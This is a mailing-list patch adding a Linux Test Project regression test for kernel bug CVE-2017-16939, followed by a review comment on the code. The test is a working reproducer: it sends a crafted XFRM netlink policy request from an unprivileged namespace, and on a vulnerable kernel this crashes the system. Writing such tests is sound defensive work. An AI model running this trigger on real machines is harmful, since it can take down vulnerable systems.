From patchwork Fri Mar 9 12:34:37 2018
X-Patchwork-Submitter: Michael Moese
X-Patchwork-Id: 883595
From: Michael Moese To: ltp@lists.linux.it Date: Fri, 9 Mar 2018 13:34:37 +0100 Message-Id: <20180309123437.30025-1-mmoese@suse.de> X-Mailer: git-send-email 2.13.6 X-Virus-Scanned: clamav-milter 0.99.2 at in-6.smtp.seeweb.it X-Virus-Status: Clean X-Spam-Status: No, score=-0.0 required=7.0 tests=SPF_PASS, T_RP_MATCHES_RCVD autolearn=disabled version=3.4.0 X-Spam-Checker-Version: SpamAssassin 3.4.0 (2014-02-07) on in-6.smtp.seeweb.it Subject: [LTP] [PATCH v2] Add regression test for CVE-2017-16939 X-BeenThere: ltp@lists.linux.it X-Mailman-Version: 2.1.18 Precedence: list List-Id: Linux Test Project List-Unsubscribe: , List-Archive: List-Post: List-Help: List-Subscribe: , MIME-Version: 1.0 Errors-To: ltp-bounces+incoming=patchwork.ozlabs.org@lists.linux.it Sender: "ltp" Based on the reproducing code from Mohammed Ghannam, published on https://blogs.securiteam.com/index.php/archives/3535 Warning! If the kernel is vulnerable to this CVE, it will definitely die. So do not run this on a production machine! Signed-off-by: Michael Moese --- Changes to v1: v1 was copied from the original reproducer. This v2 now simplified things, like not using any fork() and only allocating memory in the setup(). In addition, the many small functions were merged into still rather short setup() and run(). --- runtest/cve | 1 + testcases/cve/.gitignore | 1 + testcases/cve/cve-2017-16939.c | 89 ++++++++++++++++++++++++++++++++++++++++++ 3 files changed, 91 insertions(+) create mode 100644 testcases/cve/cve-2017-16939.c diff --git a/runtest/cve b/runtest/cve index 0c385c670..78799e2ff 100644 --- a/runtest/cve +++ b/runtest/cve @@ -30,3 +30,4 @@ cve-2017-17807 request_key04 cve-2017-1000364 stack_clash cve-2017-5754 meltdown cve-2017-17052 cve-2017-17052 +cve-2017-16939 cve-2017-16939 diff --git a/testcases/cve/.gitignore b/testcases/cve/.gitignore index c878069f1..f813e56ed 100644 --- a/testcases/cve/.gitignore +++ b/testcases/cve/.gitignore 
@@ -12,3 +12,4 @@ cve-2017-5669 meltdown stack_clash cve-2017-17052 +cve-2017-16939 diff --git a/testcases/cve/cve-2017-16939.c b/testcases/cve/cve-2017-16939.c new file mode 100644 index 000000000..a49499cf7 --- /dev/null +++ b/testcases/cve/cve-2017-16939.c 
@@ -0,0 +1,89 @@ +/* + * Copyright (c) 2018 Michael Moese + * + * This program is free software: you can redistribute it and/or modify + * it under the terms of the GNU General Public License as published by + * the Free Software Foundation, either version 2 of the License, or + * (at your option) any later version. + * + * This program is distributed in the hope that it will be useful, + * but WITHOUT ANY WARRANTY; without even the implied warranty of + * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the + * GNU General Public License for more details. + * + * You should have received a copy of the GNU General Public License + * along with this program. If not, see . + */ +/* Regression test for CVE-2017-16939 + * based on the reproducing code from Mohammed Ghannam, published on + * https://blogs.securiteam.com/index.php/archives/3535 + * + * CAUTION! If your system is vulnerable to this CVE, the kernel + * WILL DIE! + */ + +#include +#include +#include +#include +#include +#include +#include +#include +#include + +#include "tst_test.h" +#include "tst_res_flags.h" +#include "tst_safe_macros.h" +#include "tst_safe_net.h" + +#define BUFSIZE 2048 + +static int fd; +static struct sockaddr_nl addr; + +struct msg_policy { + struct nlmsghdr msg; + char buf[BUFSIZE]; +}; +static struct msg_policy *p; + +static void setup(void) +{ + if (unshare(CLONE_NEWUSER) != 0) + tst_brk(TCONF, "unshare(CLONE_NEWUSER) failed"); + if (unshare(CLONE_NEWNET) != 0) + tst_brk(TCONF, "unshare(CLONE_NEWNET) failed"); + + fd = SAFE_SOCKET(PF_NETLINK, SOCK_RAW, NETLINK_XFRM); + memset(&addr, 0, sizeof(struct sockaddr_nl)); + addr.nl_family = AF_NETLINK; + addr.nl_pid = 0; /* packet goes into the kernel */ + addr.nl_groups = XFRMNLGRP_NONE; /* no need for multicast group */ + + p = SAFE_MALLOC(sizeof(struct msg_policy)); + memset(p, 0, sizeof(struct msg_policy)); + + p->msg.nlmsg_len = 0x10; + p->msg.nlmsg_type = XFRM_MSG_GETPOLICY; + p->msg.nlmsg_flags = NLM_F_MATCH | NLM_F_MULTI | 
NLM_F_REQUEST; + p->msg.nlmsg_seq = 0x1; + p->msg.nlmsg_pid = 2; +} + +static void run(void) +{ + int var = 0x100; + + SAFE_SETSOCKOPT(fd, 1, SO_RCVBUF, &var, sizeof(int)); + SAFE_SENDTO(1, fd, (void *) &p->msg, p->msg.nlmsg_len, 0, + (struct sockaddr *) &addr, + sizeof(struct sockaddr_nl)); + + tst_res(TPASS, "Kernel seems to have survived"); +} + +static struct tst_test test = { + .setup = setup, + .test_all = run, +};
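Review bot: In run(), the setsockopt level is the bare magic number 1; spell it SOL_SOCKET so the intent is clear and the call does not depend on Linux's numeric value, i.e. `SAFE_SETSOCKOPT(fd, SOL_SOCKET, SO_RCVBUF, &var, sizeof(int));`. Likewise in setup(), `p->msg.nlmsg_len = 0x10;` hard-codes the netlink header size; `sizeof(struct nlmsghdr)` (or NLMSG_HDRLEN) says what is meant, and because only the header is ever sent, the 2048-byte buf in struct msg_policy is allocated but never used. The two `tst_brk(TCONF, ...)` calls would be more useful as `tst_brk(TCONF | TERRNO, ...)` so the log records why unshare() was refused. The tst_test struct has no .cleanup, so fd and p are never released; a cleanup that does SAFE_CLOSE(fd) and free(p) matches the usual LTP pattern. Finally, since a vulnerable kernel dies before tst_res() can run, a `tst_res(TINFO, ...)` line just before SAFE_SENDTO() would make it obvious in the console log which test was in flight when the machine went down.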